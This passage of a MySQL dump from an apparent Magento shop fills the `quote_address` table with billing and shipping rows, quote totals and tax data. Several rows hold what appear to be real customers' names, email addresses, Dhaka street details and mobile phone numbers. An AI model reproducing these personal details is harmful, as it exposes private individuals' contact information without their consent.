  `base_shipping_incl_tax` decimal(20,4) DEFAULT NULL COMMENT 'Base Shipping Incl Tax',
  `vat_id` text DEFAULT NULL COMMENT 'Vat ID',
  `vat_is_valid` smallint(6) DEFAULT NULL COMMENT 'Vat Is Valid',
  `vat_request_id` text DEFAULT NULL COMMENT 'Vat Request ID',
  `vat_request_date` text DEFAULT NULL COMMENT 'Vat Request Date',
  `vat_request_success` smallint(6) DEFAULT NULL COMMENT 'Vat Request Success',
  `validated_country_code` text DEFAULT NULL COMMENT 'Validated Country Code',
  `validated_vat_number` text DEFAULT NULL COMMENT 'Validated Vat Number',
  `gift_message_id` int(11) DEFAULT NULL COMMENT 'Gift Message ID',
  `free_shipping` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Free Shipping'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Sales Flat Quote Address';

--
-- Dumping data for table `quote_address`
--

INSERT INTO `quote_address` (`address_id`, `quote_id`, `created_at`, `updated_at`, `customer_id`, `save_in_address_book`, `customer_address_id`, `address_type`, `email`, `prefix`, `firstname`, `middlename`, `lastname`, `suffix`, `company`, `street`, `city`, `region`, `region_id`, `postcode`, `country_id`, `telephone`, `fax`, `same_as_billing`, `collect_shipping_rates`, `shipping_method`, `shipping_description`, `weight`, `subtotal`, `base_subtotal`, `subtotal_with_discount`, `base_subtotal_with_discount`, `tax_amount`, `base_tax_amount`, `shipping_amount`, `base_shipping_amount`, `shipping_tax_amount`, `base_shipping_tax_amount`, `discount_amount`, `base_discount_amount`, `grand_total`, `base_grand_total`, `customer_notes`, `applied_taxes`, `discount_description`, `shipping_discount_amount`, `base_shipping_discount_amount`, `subtotal_incl_tax`, `base_subtotal_total_incl_tax`, `discount_tax_compensation_amount`, `base_discount_tax_compensation_amount`, `shipping_discount_tax_compensation_amount`, `base_shipping_discount_tax_compensation_amnt`, `shipping_incl_tax`, `base_shipping_incl_tax`, `vat_id`, `vat_is_valid`, `vat_request_id`, `vat_request_date`, `vat_request_success`, `validated_country_code`, `validated_vat_number`, `gift_message_id`, `free_shipping`) VALUES
(1, 1, '2020-08-08 01:45:17', '2020-08-08 01:45:17', 1, 0, 1, 'billing', 'roni_cost@example.com', NULL, 'Veronica', NULL, 'Costello', NULL, NULL, '6146 Honey Bluff Parkway', 'Calder', 'Michigan', 33, '49628-7978', 'US', '(555) 229-3326', NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2, 1, '2020-08-08 01:45:17', '2020-08-08 01:45:17', 1, 0, 1, 'shipping', 'roni_cost@example.com', NULL, 'Veronica', NULL, 'Costello', NULL, NULL, '6146 Honey Bluff Parkway', 'Calder', 'Michigan', 33, '49628-7978', 'US', '(555) 229-3326', NULL, 1, 0, 'flatrate_flatrate', 'Flat Rate - Fixed', 1.0000, 29.0000, 29.0000, 29.0000, 29.0000, 2.3900, 2.3900, 5.0000, 5.0000, 0.0000, 0.0000, 0.0000, 0.0000, 36.3900, 36.3900, NULL, '{\"US-MI-*-Rate 1\":{\"amount\":2.39,\"base_amount\":2.39,\"percent\":8.25,\"id\":\"US-MI-*-Rate 1\",\"rates\":[{\"percent\":8.25,\"code\":\"US-MI-*-Rate 1\",\"title\":\"US-MI-*-Rate 1\"}],\"item_id\":null,\"item_type\":\"product\",\"associated_item_id\":null,\"process\":0}}', NULL, 0.0000, 0.0000, 31.3900, 31.3900, 0.0000, 0.0000, 0.0000, NULL, 5.0000, 5.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(3, 2, '2020-08-08 01:45:20', '2020-08-08 01:45:20', 1, 0, 1, 'billing', 'roni_cost@example.com', NULL, 'Veronica', NULL, 'Costello', NULL, NULL, '6146 Honey Bluff Parkway', 'Calder', 'Michigan', 33, '49628-7978', 'US', '(555) 229-3326', NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(4, 2, '2020-08-08 01:45:20', '2020-08-08 01:45:20', 1, 0, 1, 'shipping', 'roni_cost@example.com', NULL, 'Veronica', NULL, 'Costello', NULL, NULL, '6146 Honey Bluff Parkway', 'Calder', 'Michigan', 33, '49628-7978', 'US', '(555) 229-3326', NULL, 1, 0, 'flatrate_flatrate', 'Flat Rate - Fixed', 1.0000, 32.0000, 32.0000, 32.0000, 32.0000, 2.6400, 2.6400, 5.0000, 5.0000, 0.0000, 0.0000, 0.0000, 0.0000, 39.6400, 39.6400, NULL, '{\"US-MI-*-Rate 1\":{\"amount\":2.64,\"base_amount\":2.64,\"percent\":8.25,\"id\":\"US-MI-*-Rate 1\",\"rates\":[{\"percent\":8.25,\"code\":\"US-MI-*-Rate 1\",\"title\":\"US-MI-*-Rate 1\"}],\"item_id\":null,\"item_type\":\"product\",\"associated_item_id\":null,\"process\":0}}', NULL, 0.0000, 0.0000, 34.6400, 34.6400, 0.0000, 0.0000, 0.0000, NULL, 5.0000, 5.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(5, 3, '2020-08-17 11:08:13', '2020-08-17 11:08:13', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(6, 3, '2020-08-17 11:08:13', '2020-08-17 11:08:13', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 643.0000, 643.0000, 514.4000, 514.4000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -128.6000, -128.6000, 514.4000, 514.4000, NULL, '[]', NULL, 0.0000, 0.0000, 643.0000, 643.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(9, 4, '2020-08-22 05:12:08', '2020-08-22 05:12:08', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(10, 4, '2020-08-22 05:12:08', '2020-08-22 05:12:08', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(15, 5, '2020-08-22 07:12:49', '2020-08-22 07:12:49', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(16, 5, '2020-08-22 07:12:49', '2020-08-22 07:12:49', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(17, 6, '2020-08-22 08:24:12', '2020-08-22 08:24:12', 2, 0, NULL, 'billing', 'masum2mina@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(18, 6, '2020-08-22 08:24:12', '2020-08-22 08:24:12', 2, 0, NULL, 'shipping', 'masum2mina@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(20, 7, '2020-08-23 04:25:11', '2020-08-23 05:42:41', NULL, 0, NULL, 'shipping', 'sudipjeet.cse@gmail.com', NULL, 'Sudip', NULL, 'Dhali', NULL, 'abc', 'Naya Paltan', 'Dhaka', NULL, NULL, '1000', 'BD', '01929656367', NULL, 0, 0, 'flatrate_flatrate', 'Flat Rate - Fixed', 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 5.0000, 5.0000, 0.0000, 0.0000, -46.8000, -46.8000, 192.2000, 192.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 5.0000, 5.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(21, 8, '2020-08-23 04:29:53', '2020-08-23 04:29:53', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(22, 8, '2020-08-23 04:29:53', '2020-08-23 04:29:53', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 3.0000, 709.0000, 709.0000, 567.2000, 567.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -141.8000, -141.8000, 567.2000, 567.2000, NULL, '[]', NULL, 0.0000, 0.0000, 709.0000, 709.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(24, 7, '2020-08-23 05:43:22', '2020-08-23 05:43:22', NULL, NULL, NULL, 'billing', 'sudipjeet.cse@gmail.com', NULL, 'Sudip', NULL, 'Dhali', NULL, 'abc', 'Naya Paltan', 'Dhaka', NULL, NULL, '1000', 'BD', '01929656367', NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(25, 9, '2020-08-23 09:50:53', '2020-08-23 09:50:53', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(26, 9, '2020-08-23 09:50:53', '2020-08-23 09:50:53', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 421.0000, 421.0000, 336.8000, 336.8000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -84.2000, -84.2000, 336.8000, 336.8000, NULL, '[]', NULL, 0.0000, 0.0000, 421.0000, 421.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(27, 10, '2020-08-24 01:47:45', '2020-08-24 01:47:45', 3, 0, NULL, 'billing', 'developer@echosystech.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(28, 10, '2020-08-24 01:47:45', '2020-08-24 01:47:45', 3, 0, NULL, 'shipping', 'developer@echosystech.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 1.0000, 321.0000, 321.0000, 256.8000, 256.8000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -64.2000, -64.2000, 256.8000, 256.8000, NULL, '[]', NULL, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(29, 11, '2020-08-26 03:08:10', '2020-08-26 03:08:10', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(30, 11, '2020-08-26 03:08:10', '2020-08-26 03:08:10', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 643.0000, 643.0000, 514.4000, 514.4000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -128.6000, -128.6000, 514.4000, 514.4000, NULL, '[]', NULL, 0.0000, 0.0000, 643.0000, 643.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(31, 12, '2020-08-26 06:10:59', '2020-08-26 06:10:59', 4, 0, NULL, 'billing', 'sudipjeet.cse@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(32, 12, '2020-08-26 06:10:59', '2020-08-26 06:10:59', 4, 0, NULL, 'shipping', 'sudipjeet.cse@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(33, 13, '2020-09-14 05:34:56', '2020-09-14 05:34:56', 5, 0, NULL, 'billing', 'e.estdev@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(34, 13, '2020-09-14 05:34:56', '2020-09-14 05:34:56', 5, 0, NULL, 'shipping', 'e.estdev@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(35, 14, '2021-04-13 04:19:44', '2021-04-13 04:19:44', NULL, 0, NULL, 'billing', NULL, NULL, 'Dhali', NULL, 'Sudip', NULL, NULL, 'Dhaka', 'Dhaka', NULL, NULL, '1200', 'BD', '1200', NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(36, 14, '2021-04-13 04:19:44', '2021-04-13 04:29:21', NULL, 0, NULL, 'shipping', NULL, NULL, 'Dhali', NULL, 'Sudip', NULL, NULL, 'Dhaka', 'Dhaka', NULL, NULL, '1200', 'BD', '1200', NULL, 0, 0, 'flatrate_flatrate', 'Flat Rate - Fixed', 100.0000, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, 5.0000, 5.0000, 0.0000, 0.0000, 0.0000, 0.0000, 116.0000, 116.0000, NULL, '[]', NULL, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 0.0000, NULL, 5.0000, 5.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(39, 15, '2021-04-13 05:44:03', '2021-04-13 05:44:03', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(40, 15, '2021-04-13 05:44:03', '2021-04-13 05:44:03', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, NULL, '[]', NULL, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(41, 16, '2021-04-13 05:52:15', '2021-04-13 05:52:15', NULL, 0, NULL, 'billing', NULL, NULL, 'Raquibul', NULL, 'Hasan', NULL, NULL, 'Dhaka', 'Dhaka', NULL, NULL, '1213', 'BD', '01715568606', NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(42, 16, '2021-04-13 05:52:15', '2021-04-13 05:53:06', NULL, 0, NULL, 'shipping', NULL, NULL, 'Raquibul', NULL, 'Hasan', NULL, NULL, 'Dhaka', 'Dhaka', NULL, NULL, '1213', 'BD', '01715568606', NULL, 0, 0, 'flatrate_flatrate', 'Flat Rate - Fixed', 0.0000, 643.0000, 643.0000, 514.4000, 514.4000, 0.0000, 0.0000, 5.0000, 5.0000, 0.0000, 0.0000, -128.6000, -128.6000, 519.4000, 519.4000, NULL, '[]', NULL, 0.0000, 0.0000, 643.0000, 643.0000, 0.0000, 0.0000, 0.0000, NULL, 5.0000, 5.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(43, 17, '2021-04-13 12:12:36', '2021-04-13 12:12:36', NULL, 0, NULL, 'billing', NULL, NULL, 'Dhali', NULL, 'Sudip', NULL, NULL, 'dhaka', 'dhaka', NULL, NULL, '1200', 'BD', '01929656367', NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(44, 17, '2021-04-13 12:12:36', '2021-04-13 12:15:38', NULL, 0, NULL, 'shipping', NULL, NULL, 'Dhali', NULL, 'Sudip', NULL, NULL, 'dhaka', 'dhaka', NULL, NULL, '1200', 'BD', '01929656367', NULL, 0, 0, 'flatrate_flatrate', 'Flat Rate - Fixed', 100.0000, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, 5.0000, 5.0000, 0.0000, 0.0000, 0.0000, 0.0000, 116.0000, 116.0000, NULL, '[]', NULL, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 0.0000, NULL, 5.0000, 5.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(45, 18, '2021-04-14 04:55:19', '2021-04-14 04:55:19', NULL, 0, NULL, 'billing', NULL, NULL, 'Sudip', NULL, 'Dhali', NULL, NULL, 'Dhaka', 'Dhaka', NULL, NULL, '1200', 'BD', '01929656367', NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(46, 18, '2021-04-14 04:55:19', '2021-04-14 04:56:27', NULL, 0, NULL, 'shipping', NULL, NULL, 'Sudip', NULL, 'Dhali', NULL, NULL, 'Dhaka', 'Dhaka', NULL, NULL, '1200', 'BD', '01929656367', NULL, 0, 0, 'flatrate_flatrate', 'Flat Rate - Fixed', 0.0000, 643.0000, 643.0000, 514.4000, 514.4000, 0.0000, 0.0000, 5.0000, 5.0000, 0.0000, 0.0000, -128.6000, -128.6000, 519.4000, 519.4000, NULL, '[]', NULL, 0.0000, 0.0000, 643.0000, 643.0000, 0.0000, 0.0000, 0.0000, NULL, 5.0000, 5.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(47, 19, '2021-04-21 10:04:04', '2021-04-21 10:04:04', 6, 0, NULL, 'billing', 'tanmoybasak307@yahoo.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(48, 19, '2021-04-21 10:04:04', '2021-04-21 10:04:04', 6, 0, NULL, 'shipping', 'tanmoybasak307@yahoo.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 100.0000, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 111.0000, 111.0000, NULL, '[]', NULL, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(49, 20, '2021-04-26 09:11:36', '2021-04-26 09:11:36', 7, 0, NULL, 'billing', 'khanmrh@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(50, 20, '2021-04-26 09:11:36', '2021-04-26 09:11:36', 7, 0, NULL, 'shipping', 'khanmrh@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
